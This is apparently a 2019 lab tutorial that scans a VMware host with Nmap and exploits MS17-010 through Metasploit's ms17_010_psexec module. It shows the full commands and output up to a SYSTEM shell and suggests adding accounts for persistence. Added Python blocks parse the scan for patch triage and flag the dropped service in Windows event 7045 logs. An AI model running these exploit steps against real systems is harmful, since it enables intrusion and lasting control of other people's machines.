Using Metasploit + Nmap to penetrate a network server and obtain administrator privileges directly
Date: 2019/12/8 2:04:52
Metasploit is a powerful penetration tool, so I won't introduce it at length here, and Nmap is a powerful port scanner that everyone in the hacker world knows. This post mainly covers using the two tools together. Without further ado, let's get straight to the point.
Step 1: Scan with Nmap
msf5 > db_nmap --script=vuln 192.168.41.143
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 01:25 CST
[*] Nmap: Nmap scan report for 192.168.41.143
[*] Nmap: Host is up (0.00055s latency).
[*] Nmap: All 1000 scanned ports on 192.168.41.143 are filtered
[*] Nmap: MAC Address: 00:0C:29:42:D2:0A (VMware)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 36.95 seconds
msf5 > db_nmap --script=vuln 192.168.41.143
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 01:28 CST
[*] Nmap: Nmap scan report for 192.168.41.143
[*] Nmap: Host is up (0.00076s latency).
[*] Nmap: All 1000 scanned ports on 192.168.41.143 are filtered
[*] Nmap: MAC Address: 00:0C:29:42:D2:0A (VMware)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 38.98 seconds
msf5 > db_nmap --script=vuln 192.168.41.142
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 01:30 CST
[*] Nmap: Nmap scan report for 192.168.41.142
[*] Nmap: Host is up (0.00044s latency).
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT    STATE SERVICE
[*] Nmap: 135/tcp open  msrpc
[*] Nmap: 139/tcp open  netbios-ssn
[*] Nmap: 445/tcp open  microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:5D:58:E1 (VMware)
[*] Nmap: Host script results:
[*] Nmap: |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
[*] Nmap: |_smb-vuln-ms10-054: false
[*] Nmap: |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
[*] Nmap: | smb-vuln-ms17-010:
[*] Nmap: |   VULNERABLE:
[*] Nmap: |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
[*] Nmap: |     State: VULNERABLE
[*] Nmap: |     IDs:  CVE:CVE-2017-0143
[*] Nmap: |     Risk factor: HIGH
[*] Nmap: |       A critical remote code execution vulnerability exists in Microsoft SMBv1
[*] Nmap: |        servers (ms17-010).
[*] Nmap: |
[*] Nmap: |     Disclosure date: 2017-03-14
[*] Nmap: |     References:
[*] Nmap: |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
[*] Nmap: |       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
[*] Nmap: |_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 21.53 seconds
Looking at the scan results, we can see a few exploitable vulnerabilities: port 445 is open and SMB is running on it. We'll pick one of the vulnerabilities to carry out the penetration attack.
Step 2: Use Metasploit to look up the matching vulnerability module
First we enter the command search ms17-010 to check whether a matching vulnerability module exists.
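From the defender's side, the useful output of a db_nmap --script=vuln run is the list of hosts where a script reported State: VULNERABLE, so they can be queued for patching. The following Python parser is an added example, not code from the original post or from Nmap or Metasploit; it reads the msfconsole "[*] Nmap:" line format shown above, groups results by host, records open ports, and collects the CVE ids of every script that reported VULNERABLE. The sample input is constructed here from the kind of lines the page shows.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: two hosts as in the post, one fully filtered, one with
# SMB exposed and smb-vuln-ms17-010 reporting VULNERABLE.
SAMPLE_OUTPUT = """\
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 01:28 CST
[*] Nmap: Nmap scan report for 192.168.41.143
[*] Nmap: Host is up (0.00076s latency).
[*] Nmap: All 1000 scanned ports on 192.168.41.143 are filtered
[*] Nmap: MAC Address: 00:0C:29:42:D2:0A (VMware)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 38.98 seconds
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 01:30 CST
[*] Nmap: Nmap scan report for 192.168.41.142
[*] Nmap: Host is up (0.00044s latency).
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT    STATE SERVICE
[*] Nmap: 135/tcp open  msrpc
[*] Nmap: 139/tcp open  netbios-ssn
[*] Nmap: 445/tcp open  microsoft-ds
[*] Nmap: Host script results:
[*] Nmap: |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
[*] Nmap: |_smb-vuln-ms10-054: false
[*] Nmap: |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
[*] Nmap: | smb-vuln-ms17-010:
[*] Nmap: |   VULNERABLE:
[*] Nmap: |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
[*] Nmap: |     State: VULNERABLE
[*] Nmap: |     IDs:  CVE:CVE-2017-0143
[*] Nmap: |     Risk factor: HIGH
[*] Nmap: |       A critical remote code execution vulnerability exists in Microsoft SMBv1
[*] Nmap: |        servers (ms17-010).
[*] Nmap: |
[*] Nmap: |     Disclosure date: 2017-03-14
[*] Nmap: |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 21.53 seconds
"""


@dataclass
class HostReport:
    address: str
    open_ports: list = field(default_factory=list)   # (port, proto, service)
    vulnerable: dict = field(default_factory=dict)   # script name -> [CVE ids]


PREFIX_RE = re.compile(r"^\[\*\] Nmap: ?")
REPORT_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)")
# A script name sits exactly one character after the leading "|" ("| name:" or
# "|_name:"); indented detail lines such as "|   VULNERABLE:" do not match.
SCRIPT_RE = re.compile(r"^\|[ _]([\w-]+):")
STATE_RE = re.compile(r"^\|\s+State:\s+(\S+)")
IDS_RE = re.compile(r"^\|\s+IDs:\s+(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d+")


def parse_db_nmap(text):
    """Parse msfconsole db_nmap output into {address: HostReport}."""
    hosts = {}
    current = None
    script = None
    for raw in text.splitlines():
        line = PREFIX_RE.sub("", raw.rstrip())
        m = REPORT_RE.match(line)
        if m:
            current = hosts.setdefault(m.group(1), HostReport(m.group(1)))
            script = None
            continue
        if current is None:
            continue
        m = PORT_RE.match(line)
        if m:
            current.open_ports.append((int(m.group(1)), m.group(2), m.group(3)))
            continue
        m = SCRIPT_RE.match(line)
        if m:
            script = m.group(1)          # following "|" lines belong to this script
            continue
        if script is None:
            continue
        m = STATE_RE.match(line)
        if m and m.group(1) == "VULNERABLE":
            current.vulnerable.setdefault(script, [])
            continue
        m = IDS_RE.match(line)
        if m and script in current.vulnerable:
            current.vulnerable[script].extend(CVE_RE.findall(m.group(1)))
    return hosts


def vulnerable_hosts(hosts):
    """Addresses with at least one VULNERABLE script result, for patch triage."""
    return sorted(h.address for h in hosts.values() if h.vulnerable)


if __name__ == "__main__":
    for addr, report in parse_db_nmap(SAMPLE_OUTPUT).items():
        print(addr, [p for p, _, _ in report.open_ports], report.vulnerable)
```

Scripts that only return false, an access-denied status, or an error (the ms10-054, ms10-061 and samba lines above) are deliberately not counted; only an explicit State: VULNERABLE produces a finding, which keeps the triage list free of inconclusive checks.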
msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
The result shows that matching modules exist ("ms17" means a vulnerability published in 2017). With a matching module, the rest is easy: any of the bottom three will do, and I'll pick the last one to continue the penetration attack.
Step 3: Select the attack module
Since I can't capture a complete screenshot, I'm attaching the console output.
msf5 > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > show options

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                                 Required  Description
   ----                  ---------------                                                 --------  -----------
   DBGTRACE              false                                                           yes       Show extra debug trace info
   LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
   NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                                yes       The target address range or CIDR identifier
   RPORT                 445                                                             yes       The Target port
   SERVICE_DESCRIPTION                                                                   no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                  no        The service display name
   SERVICE_NAME                                                                          no        The service name
   SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                               no        The password for the specified username
   SMBUser                                                                               no        The username to authenticate as

Payload options (windows/shell_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic
If that is unclear, look at the picture carefully. First we run the command:
show options
to see which settings need to be configured; at minimum the target server IP has to be set. Once that is configured, everything is ready.
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.41.142
RHOSTS => 192.168.41.142
msf5 exploit(windows/smb/ms17_010_psexec) >
At this point everything is configured. Now, getting a little excited, I can't wait to give the order to attack. The attack command is: exploit
msf5 exploit(windows/smb/ms17_010_psexec) > exploit

[*] 192.168.41.142:445 - Target OS: Windows 5.1
[*] 192.168.41.142:445 - Filling barrel with fish... done
[*] 192.168.41.142:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.41.142:445 - 	[*] Preparing dynamite...
[*] 192.168.41.142:445 - 		[*] Trying stick 1 (x86)...Boom!
[*] 192.168.41.142:445 - 	[+] Successfully Leaked Transaction!
[*] 192.168.41.142:445 - 	[+] Successfully caught Fish-in-a-barrel
[*] 192.168.41.142:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.41.142:445 - Reading from CONNECTION struct at: 0x821e58b0
[*] 192.168.41.142:445 - Built a write-what-where primitive...
[+] 192.168.41.142:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.41.142:445 - Selecting native target
[*] 192.168.41.142:445 - Uploading payload... uIppviFQ.exe
[*] 192.168.41.142:445 - Created \uIppviFQ.exe...
[+] 192.168.41.142:445 - Service started successfully...
[*] 192.168.41.142:445 - Deleting \uIppviFQ.exe...
[*] Started bind TCP handler against 192.168.41.142:4444
[*] Command shell session 1 opened (192.168.41.128:33767 -> 192.168.41.142:4444) at 2019-08-24 01:41:00 +0800
We can see that the attack against port 445 is now under way.
Further down we can see that the intrusion succeeded and a shell came back.
We now hold system privileges on this server. Checking the network connections shows the connection was established successfully. With a cmd shell we can control this server, for example by creating a system account for privilege escalation and persistent control. That's all for today, thanks everyone.
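From the defender's side, the exploit output above leaves a clear host artifact: a random-looking 8-letter executable is written to the root of the ADMIN$ share (C:\Windows), started as a service, and then deleted, so the service-installation record is the durable evidence. The following Python is an added example, not code from the original post or from Metasploit; it scores constructed service-install records, modelled on the EventData fields of the Windows System log event 7045 ("A service was installed in the system"), and flags the combination seen on the page. The event records, the service name hZxqTbWk, and the vendor paths are constructed for the example; only the uIppviFQ.exe filename comes from the page.

```python
import re

# Constructed sample records (field names modelled on event 7045 EventData).
# The second record mirrors the page's exploit output; the rest are benign.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "Vendor Update Service",
     "ImagePath": r"C:\Program Files\Vendor\updsvc.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "hZxqTbWk",
     "ImagePath": r"C:\Windows\uIppviFQ.exe", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "WdiSystemHost",
     "ImagePath": r"%SystemRoot%\system32\svchost.exe -k LocalSystemNetworkRestricted",
     "AccountName": "LocalSystem"},
    {"EventID": 7036, "ServiceName": "Spooler", "ImagePath": "", "AccountName": ""},
]

# Exactly eight ASCII letters, as in the page's uIppviFQ.exe.
EIGHT_LETTERS_RE = re.compile(r"[A-Za-z]{8}")
# A bare .exe directly under the Windows directory, which is what the ADMIN$
# share root maps to; legitimate services almost never live there.
SYSTEMROOT_EXE_RE = re.compile(
    r"^(?:%SystemRoot%|[A-Za-z]:\\Windows)\\([^\\\s]+\.exe)$", re.IGNORECASE)


def looks_random(name):
    """Eight letters with mixed case and no spaces: a generated, not human, name."""
    return (EIGHT_LETTERS_RE.fullmatch(name) is not None
            and name != name.lower() and name != name.upper())


def score_service_install(event):
    """Return the list of reasons a service-install record looks like a
    dropped-binary service; an empty list means nothing suspicious."""
    reasons = []
    if event.get("EventID") != 7045:
        return reasons
    m = SYSTEMROOT_EXE_RE.match(event.get("ImagePath", ""))
    if m:
        reasons.append("service binary sits in the root of the Windows directory (ADMIN$ share root)")
        if looks_random(m.group(1)[:-4]):        # strip ".exe"
            reasons.append("random-looking 8-letter executable name")
    if looks_random(event.get("ServiceName", "")):
        reasons.append("random-looking 8-letter service name")
    return reasons


def flag_suspicious(events, min_reasons=2):
    """Keep only records that trip at least min_reasons heuristics."""
    flagged = []
    for event in events:
        reasons = score_service_install(event)
        if len(reasons) >= min_reasons:
            flagged.append((event, reasons))
    return flagged


if __name__ == "__main__":
    for event, reasons in flag_suspicious(SAMPLE_EVENTS):
        print(event["ServiceName"], event["ImagePath"])
        for r in reasons:
            print("  -", r)
```

Requiring two independent reasons keeps a lone oddly named service or a lone binary in C:\Windows from alerting on its own; the record from the page trips all three. Because the module deletes the executable straight after the service starts, a file-system sweep after the fact finds nothing, which is why the service-install event (and the SMB write to ADMIN$ that preceded it) are the records worth collecting centrally, alongside fixing the unpatched MS17-010 host the Nmap scan reported.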